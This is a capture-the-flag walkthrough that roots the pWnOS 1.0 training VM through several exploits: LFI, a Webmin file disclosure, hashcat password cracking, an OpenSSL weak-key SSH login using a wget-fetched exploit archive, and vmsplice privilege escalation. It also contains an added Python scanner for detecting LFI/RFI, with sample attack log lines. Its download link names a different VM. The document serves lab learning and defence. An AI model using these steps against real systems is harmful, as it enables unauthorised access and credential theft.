pWnOS 1.0 Boot2Root VM Walkthrough

Overview

pWnOS 1.0 is a deliberately vulnerable boot2root virtual machine designed by @Chronicoder for n00bs passionate about learning how system and application vulnerabilities lead to compromise. The goal is to root the VM by exploiting the vulnerabilities found and to get the flag at /root/flag.txt. Reading /root/flag.txt is the benchmark showing that the system has been compromised successfully.

Download Link: https://www.vulnhub.com/entry/pwnlab-init,158/

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in bridge mode
  • pWnOS VM in bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • hashcat

Vulnerabilities Exploited:

  • Local File Inclusion
  • Webmin Arbitrary File Disclosure
  • Weak Passwords
  • OpenSSL Predictable PRNG (CVE-2008-0166)
  • Linux Kernel 2.6.17 < 2.6.24.1 – ‘vmsplice’ Local Privilege Escalation (2)

Reconnaissance

#netdiscover

image1

Target VM IP Address: 192.168.8.102

Scanning

nmap

nmap -p- -A -oX nmap-pwnOS.xml --webxml 192.168.8.102
image2

Nmap findings:

1- Target box is a Linux machine.

2- SSH server is enabled.

3- Apache server is listening on port 80.

4- Webmin httpd version 0.01 is enabled on the default port 10000.

Exploit Path 1: Hacking the website

Explore the website in a browser to find a vulnerability to exploit.

image3

Found a file inclusion vulnerability in the connect parameter of the query string. LFI is exploitable.

image4

Usernames found: root, vmware, obama, osama, yomama

Unfortunately, /etc/shadow and /var/log/apache2/access.log are not accessible through the website, so we cannot proceed further along this path. RFI is not possible either: URL file-access is disabled in the server configuration.

Let's explore Webmin.
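A defender's view of the same weakness, added here as an example and not part of the original walkthrough: a small Python scanner that flags LFI and RFI attempts in the `connect` parameter of Apache access-log lines, then counts hits per client IP. The page name /index.php, the client IPs and the log lines themselves are constructed for the example, not taken from the VM.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlparse

# Apache combined log format: client IP first, request line in quotes, then status and size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d{3} \S+')

TRAVERSAL = re.compile(r'\.\.[/\\]')                                   # ../ or ..\
SENSITIVE = re.compile(r'/etc/(passwd|shadow|group)|/var/log/|/proc/self/environ', re.I)
REMOTE = re.compile(r'^(https?|ftp|php|data|expect)://', re.I)        # RFI / PHP wrappers

# Constructed sample lines; IPs, page name and timestamps are invented for this example.
SAMPLE_LOG = [
    '192.168.8.50 - - [10/Mar/2018:10:01:02 +0000] "GET /index.php?connect=include.php HTTP/1.1" 200 512',
    '192.168.8.50 - - [10/Mar/2018:10:01:09 +0000] "GET /index.php?connect=../../../../etc/passwd HTTP/1.1" 200 1802',
    '192.168.8.50 - - [10/Mar/2018:10:01:15 +0000] "GET /index.php?connect=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0',
    '192.168.8.50 - - [10/Mar/2018:10:01:22 +0000] "GET /index.php?connect=http://203.0.113.9/s.txt HTTP/1.1" 200 77',
    '192.168.8.77 - - [10/Mar/2018:10:02:00 +0000] "GET /index.php?connect=about.php HTTP/1.1" 200 400',
]

def classify(value):
    """Return the indicator names that fire on one decoded parameter value."""
    hits = []
    if TRAVERSAL.search(value):
        hits.append("traversal")
    if SENSITIVE.search(value):
        hits.append("sensitive-path")
    if REMOTE.match(value):
        hits.append("remote-include")
    return hits

def scan(lines, param="connect"):
    """Return (client_ip, decoded_value, indicators) for each request whose `param` looks like LFI/RFI."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = parse_qs(urlparse(m["path"]).query, keep_blank_values=True)
        for value in query.get(param, []):
            decoded = unquote(value)  # parse_qs decoded once; a second pass catches double-encoding
            hits = classify(decoded)
            if hits:
                findings.append((m["ip"], decoded, hits))
    return findings

def summarize(findings):
    """Flagged requests per client IP, the quickest triage pivot."""
    return dict(Counter(ip for ip, _, _ in findings))
```

Run `scan(SAMPLE_LOG)` and `summarize(...)` over a real access.log by reading the file into `lines`; on the sample, the three flagged requests all come from 192.168.8.50.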

Exploit Path 2: Webmin exploit

From nmap, we know the Webmin version, and it looks old. Let's search for an exploit and use it.

image5

We can read arbitrary files with the Webmin exploit 2017.pl. More critically, we can read any file with root privileges.

image6

Crack the Linux passwords with hashcat:

hashcat -m 500 -a 0 -o cracked.txt --force hash.txt /usr/share/wordlists/sqlmap.txt

image7

The vmware password is cracked.

SSH access is granted.

image8

Exploit Path 3: SSH authorized keys

Since we already know the usernames on the server, let's try to read the SSH authorized keys for the known users.

image9

Since the authorized keys are accessible, let's try this exploit:

https://www.exploit-db.com/exploits/5720/

To use the exploit, we must first download the database mentioned in the exploit from this location and decompress it:
#wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

#tar xvjf 5622.tar.bz2
Search for the SSH authorized keys in this database.

image10

dcbe2a56e8cdea6d17495f6648329ee2-4679.pub

Log in with the key:

ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.8.102

image11

Privilege Escalation

searchsploit linux vmsplice

We already have secure shell access to the vmware and obama user accounts on the target box. Let's upload the exploit code 5092.c to the server, compile it, and execute the exploit.

image12

Congrats! We are root!

Conclusion

This was an excellent boot2root VM. I learned a lot, and thanks to @Chronicoder for putting in the effort to design such a great VM for students like me to learn and practice security concepts.
